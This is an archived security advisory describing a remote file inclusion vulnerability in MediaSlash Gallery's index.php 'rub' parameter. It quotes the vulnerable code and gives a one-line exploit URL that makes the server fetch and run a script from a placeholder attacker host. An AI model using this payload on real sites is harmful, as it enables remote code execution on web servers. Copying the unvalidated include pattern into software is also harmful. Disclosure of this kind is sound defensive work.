TUCoPS :: Web :: Apps :: b06-1319.htm

MediaSlash Gallery 'rub' variable Remote File inlcusion Vulnerability
MediaSlash Gallery 'rub' variable Remote File inlcusion Vulnerability
MediaSlash Gallery 'rub' variable Remote File inlcusion Vulnerability



author: [Moroccan Security Team]
Vendor: www.MediaSlash.com 
Vendor Contacted
greetz to : [Moroccan Security Team] CiM-TeaM and All Freinds
Google : Powered by MediaSlash.com
Details:

MediaSlash Galleryis is vulnerable to remote URL inclusion vulnerability
This flaw is due to an input validation error in the "index.php"(line 489)
script that does not validate the "rub" variable,remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server
 
Code:
 
27 . 		$rub = @$_GET["rub"];
...
57 .		$page_menu = ''.$rub.'/index.php';
489.		 //!!!!!!!!


Exploit http://[trajet]/[path]/index.php?rub=http://[attacker] 

http://[attacker]/index.php will be included and executed withe 
the privileges of the web server

Simo64 Moroccan Security Team :) simo64[at]gmail[dot]com

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH